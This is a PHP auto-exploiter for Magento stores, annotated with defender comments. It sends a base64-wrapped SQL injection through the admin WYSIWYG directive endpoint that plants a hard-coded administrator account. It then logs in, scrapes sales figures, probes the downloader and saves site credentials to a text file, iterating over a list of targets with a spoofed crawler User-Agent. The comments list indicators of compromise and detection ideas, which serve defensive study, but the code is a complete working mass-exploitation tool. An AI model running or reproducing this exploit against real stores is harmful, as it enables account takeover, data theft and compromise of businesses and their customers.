- <?php
- // Analyst note: all PHP diagnostics are silenced and the execution time limit is lifted,
- // so the script can run unattended over a long input list without printing errors.
- error_reporting(0);
- set_time_limit(0);
- /*
- ----------------------
- Name : Auto Exploiter Magento
- Date : 27/02/2016
- Thank's : Ja , Kevin a.k.a Mr.K , ANGK3RS T3AM
- ----------------------
- IndoXploit Coder's | Bug7sec Team | Defacer Tersakiti Team
- ----------------------
- Tuban Cyber Team
- ----------------------
- */
- // Analyst note (indicators of compromise): hard-coded account values that the requests below
- // try to plant in a Magento admin_user table. A store holding an admin named "shortcut", or an
- // admin e-mail of the form shor7cut-<unix timestamp>@gmail.com, should be handled as compromised:
- // remove the account, rotate every admin credential and review admin_role for unexpected rows.
- $username = "shortcut";
- $password = "bug7sec";
- $email = "shor7cut-".time()."@gmail.com";
- // ck_admin: sends a single POST to "$site/admin/Cms_Wysiwyg/directive/index/" and returns true
- // when the response contains a hidden form_key input, false otherwise.
- //
- // What the request carries (for detection and triage):
- //   * three form fields: "___directive" (a fixed base64 blob), "filter" (base64 of $a) and "forwarded"=1;
- //   * inside "filter", the popularity[field_expr] value closes the expression with ")" and appends
- //     stacked SQL statements, i.e. an SQL injection through the report grid filter;
- //   * the appended SQL inserts one row into admin_user and one into admin_role.
- //
- // Database artefacts left by that SQL: firstname 'Firstname', lastname 'Lastname', role_name
- // 'Firstname', and a password value built as MD5(salt . password) followed by ":rp" (fixed salt 'rp').
- // Hunting admin_user for hashes ending in ":rp" together with those placeholder names is a
- // practical check on a store suspected of being hit.
- //
- // Mitigation lies on the server side: keep Magento on a patched release and restrict who can
- // reach the admin path at all (allow-list, VPN or HTTP auth in front of it).
- function ck_admin($site,$username,$password,$email){
- // Injected filter string; $password, $email and $username are concatenated in unescaped.
- $a="popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '".$password."') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','".$email."','".$username."',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '".$username."'),'Firstname');";
- $bs=base64_encode($a);
- // "___directive" is a constant string, so it is usable as a literal match in WAF/IDS rules.
- $post=array(
- "___directive" => "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
- "filter" => $bs,
- "forwarded" => 1
- );
- echo "|_[ Check admin ... ";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/admin/Cms_Wysiwyg/directive/index/");
- curl_setopt($ch, CURLOPT_HEADER, false);
- // Fixed crawler-style User-Agent; the same string is set by every request function in this listing.
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- // TLS peer and host verification are both switched off.
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 30);
- // Session cookies are kept in cookie.txt in the working directory and shared by the later requests.
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec($ch);
- // $httpcode is read here but not used anywhere in this function.
- $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- // Success heuristic: any hidden form_key input in the returned HTML.
- $re = "/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\" \\/>/";
- preg_match($re, $data, $matches);
- if($matches[1]){
- echo "w00t\r\n";
- return true;
- }
- echo "JM800t\r\n";
- echo "|\r\n";
- return false;
- }
- // ck_pass: POSTs "email=<$email>" to "$site/index.php/admin/index/forgotpassword/" and returns
- // true when the response body contains the text "success-msg", false otherwise.
- //
- // Detection note: an admin password-reset request for an address of the form
- // shor7cut-<timestamp>@gmail.com (see the $email global) identifies this tool in access and mail logs.
- // The curl handle opened here is never closed in this function.
- function ck_pass($site,$email){
- echo "|_[ Check forgotpass ... ";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/index.php/admin/index/forgotpassword/");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- // TLS peer and host verification are both switched off.
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "email=".$email."");
- $data = curl_exec($ch);
- $re = "/success-msg/";
- preg_match($re, $data, $matches);
- if($matches[0]){
- return true;
- // The two echo statements below sit after the return and never execute.
- echo "w00t\r\n";
- echo "|\r\n";
- }else{
- echo "JM800t\r\n";
- echo "|\r\n";
- return false;
- }
- // Not reached: both branches above return.
- echo "|\r\n";
- }
- // ck_price: scans $data (HTML) for <span class="price">…</span> elements and returns one line
- // "|_[ Sales/Orders : <first>/<second>" built from the first two matches.
- // $matches[0] holds the full matched text, so the span tags themselves are part of the output.
- // No check is made that two matches exist.
- // Impact note: this is where business figures shown on the page returned after an admin login
- // are read out, i.e. the compromise exposes store data, not only the login itself.
- function ck_price($data){
- $re = "/<span class=\"price\">(.*?)<\\/span>/";
- preg_match_all($re, $data, $matches);
- $price = "|_[ Sales/Orders : ".$matches[0][0]."/".$matches[0][1]."\r\n";
- return $price;
- }
- // save: appends $data to the file $name (mode "a+"), terminating the script with
- // "Unable to open file!" if the file cannot be opened. Returns nothing.
- // In this listing it is only called to write results to magento.txt.
- function save($name,$data){
- $myfile = fopen($name, "a+") or die("Unable to open file!");
- fwrite($myfile, $data);
- fclose($myfile);
- }
- // ck_login: POSTs login[username] / login[password] to "$site/admin" and returns true when the
- // response contains a link-logout anchor whose text is exactly "Log Out"; otherwise false.
- // On success it also prints the line produced by ck_price() for the returned page.
- //
- // Detection note: a successful admin login for the planted username arriving with the
- // crawler-style User-Agent set below is not something a legitimate administrator produces;
- // correlating admin logins with User-Agent and source address surfaces it.
- // The curl handle opened here is never closed in this function.
- function ck_login($site,$username,$password){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/admin");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- // TLS peer and host verification are both switched off.
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
- $data = curl_exec($ch);
- $re = "/class=\"link-logout\">(.*?)<\\/a>/";
- preg_match($re, $data, $matches);
- if($matches[1]=="Log Out"){
- echo "|_[ Login admin ... w00t\r\n";
- echo ck_price($data);
- return true;
- }else{
- echo "|_[ Login admin ... JM800t\r\n";
- return false;
- }
- }
- // ck_download: POSTs the same login fields to "$site/downloader/index.php" and inspects the page.
- //   * "Log Out" present            -> treated as a successful downloader login;
- //   * write-permission warning text -> prints "Kesalahan permissions" (a permissions error message);
- //   * otherwise looks for the string "Grizzly_MassEmail" in the page, presumably to tell whether a
- //     mass-mail extension is installed (inferred from the name; confirm against the target page).
- // Results are appended to magento.txt as "[Login] site,username,password" and, when $smtp is
- // true, also "[Login+SMTP] ...". Returns false when the login text is absent; the success path
- // has no return statement.
- //
- // As written, both branches of the Grizzly_MassEmail test print the same "w00t" line, and $smtp
- // is left unset when the write-permission warning is found.
- //
- // Defender notes: magento.txt holds site names and credentials in clear text and is the artefact
- // to look for on a seized or compromised staging host. On the store side, the /downloader path
- // should not be reachable from the internet and admin credentials should not be valid there
- // without additional access control.
- function ck_download($site,$username,$password){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$site/downloader/index.php");
- curl_setopt($ch, CURLOPT_HEADER, false);
- curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- // TLS peer and host verification are both switched off.
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
- $data = curl_exec($ch);
- //echo $data;
- if(preg_match("/Log Out/",$data)){
- echo "|_[ Login downloader w00t\r\n";
- $login = true;
- if(preg_match("/Warning: Your Magento folder does not have sufficient write permissions./",$data)){
- echo "|_[ Kesalahan permissions\r\n";
- }else{
- if(eregi("Grizzly_MassEmail", $data)){
- echo "|_[ Package Smtp w00t\r\n";
- $smtp = true;
- }else{
- $smtp = false;
- echo "|_[ Package Smtp w00t\r\n";
- }
- }
- if($login){
- // Clear-text record of the site and the planted credentials.
- save("magento.txt","[Login] $site,$username,$password \r\n");
- if($smtp){
- save("magento.txt","[Login+SMTP] $site,$username,$password \r\n");
- }
- }
- }else{
- echo "|_[ Login downloader .. JM800t\r\n";
- return false;
- }
- }
- // Driver: takes a file path as the first command-line argument, splits its content on CRLF into a
- // list of sites, and for each one deletes cookie.txt and runs ck_admin -> ck_pass -> ck_login ->
- // ck_download. $no counts sites processed, $no_c is the list size, $v counts sites that passed
- // both ck_admin and ck_pass.
- //
- // Defender reading: the tool is list-driven rather than aimed at one store, so exposure depends
- // only on being reachable and unpatched. In server logs the run shows up as one client hitting,
- // in quick succession, /admin/Cms_Wysiwyg/directive/index/, /index.php/admin/index/forgotpassword/,
- // /admin and /downloader/index.php with the same User-Agent; alerting on that sequence is a
- // reasonable detection.
- if(isset($argv[1])){
- if(file_exists($argv[1])){
- $shc_fgt = file_get_contents($argv[1]);
- $explodes = explode("\r\n", $shc_fgt);
- cover();
- $no=1;
- $no_c = count($explodes);
- $v=0;
- foreach ($explodes as $site) {
- // A fresh cookie jar per site keeps one store's session from leaking into the next request set.
- unlink(getcwd().'/cookie.txt');
- echo "|----[$no|$no_c|$v]----\r\n";
- echo "|-[ $site\r\n";
- if(ck_admin($site,$username,$password,$email)){
- if(ck_pass($site,$email)){
- echo "w00t\r\n";
- ck_login($site,$username,$password);
- ck_download($site,$username,$password);
- echo "|\r\n";
- $v++;
- }
- }
- $no++;
- }
- }
- }
- // cover: prints the tool's text banner to standard output. The $site parameter is declared but
- // not used in the body. The banner strings are fixed and can serve as a static signature when
- // scanning hosts or file shares for copies of this script.
- function cover($site){
- echo "|-------------------------------------------|\r\n";
- echo "| Exploit Magento |\r\n";
- echo "|-------------------------------------------|\r\n";
- echo "|SHOR7CUT | BUG7SEC | DEFACER TERSAKITI TEAM|\r\n";
- echo "|-------------------------------------------|\r\n";
- echo "|\r\n";
- }
- ?>